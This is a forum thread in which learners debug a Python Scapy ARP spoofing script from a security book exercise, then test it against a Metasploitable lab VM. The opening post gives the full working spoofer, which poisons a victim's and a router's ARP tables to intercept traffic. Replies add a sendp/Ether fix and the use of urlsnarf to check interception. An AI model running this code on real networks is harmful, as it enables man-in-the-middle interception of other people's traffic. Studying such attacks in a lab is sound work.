Python Scapy, the ARP packge gives me the WARNING that I should put destination mac address, but I did
I have this code, I want to automize the process of ARP Spoofing.
You run the program like this sudo python3 arpSpoof.py 192.168.1.1 192.168.1.101
The first IP address is the one of the router, and the other one is the one of the victim machine machine.
This is the code:
import sys
from scapy.all import *



def arp_spoof (dest_ip, dest_mac, source_ip):
    packet = ARP(op="is-at", psrc= source_ip, hwdst=dest_mac, pdst=dest_ip )
    send(packet, verbose=False)


def arp_restore (dest_ip, dest_mac, source_ip, source_mac):
    packet = ARP(op="is-at", hwsrc=source_mac, psrc=source_ip, hwdst=dest_mac, pdst=dest_ip)
    send(packet, verbose=False)


def main():
    victim_ip =  sys.argv[1]
    print(victim_ip)
    router_ip =  sys.argv[2]
    print(router_ip)
    victim_mac =  getmacbyip(victim_ip)
    router_mac =  getmacbyip(router_ip)
    try:
        print("Sending spoofed ARP packets")
        while True: 
            arp_spoof(victim_ip, victim_mac, router_ip) 
            arp_spoof(router_ip, router_mac, victim_ip)
    except KeyboardInterrupt:
        print("Restoring ARP Tables")
        arp_restore(router_ip, router_mac, victim_ip, victim_mac)
        arp_restore(victim_ip, victim_mac, router_ip, router_mac)
    quit()

main()


When I execute the program, it starts fine, but then when it's executing the arp_spoof function, I get an error: WARNING: You should be providing the Ethernet destination MAC address when sending an is-at ARP.
But Im'providing the MAC address destionation (hwdest)
How should I fix the code?
Thank you

Hi! Could you provide the complete stacktrace? With current description, it’s hard to tell where the issue really lies.

Thank you, but I managed to solve.

The send() method sends packet at layer 3, instead I tried to use the sendp() method.
This method sends packet al layer 2, and so I added a Ether section (with the destination mac address) and a Padding section (that looks like: Padding(load = "X"*18) )

And so adding the destination mac in the Ether section, removed the problem and the warnings

Nice! You may then create an answer to your question, and mark it as the solution. This will help people facing the same issue :-)

So I was working on the same exercise from the same book. I was getting the same error as you did so I followed what you did, and used the
sendp(Ether(dst=dest_mac)/packet, verbose=False)

Maybe this isn't what you meant in your comments that you solved this because it wasn't clear from what you wrote. I was able to get the program to run without any errors, and the program from earlier in the chapter, arpDetector.py, is showing that the ARP records are indeed changing, however if you leave arpDetector.py running in one terminal window, and then run
urlsnarf -i eth0

In another window to see if you are actually intercepting packets you'll notice that you are not intercepting any packets. You can test this while running:
wget http://www.google.com

On the victim metasploitable VM. When I went back to using the send() method I was getting the "WARNING: You should be providing the Ethernet destination MAC address when sending an is-at ARP." but when you test again you will actually be intercepting the packets. Not sure if it's possible to get this to work without the warnings, as I am still a noob and learning. Maybe we can figure it out!
One more thing I forgot, the book is telling us that the correct usage for this is actually:
sudo python3 arpSpoof.py <VICTIM-IP> <ROUTER-IP>

not sure if it matters really but maybe it does.
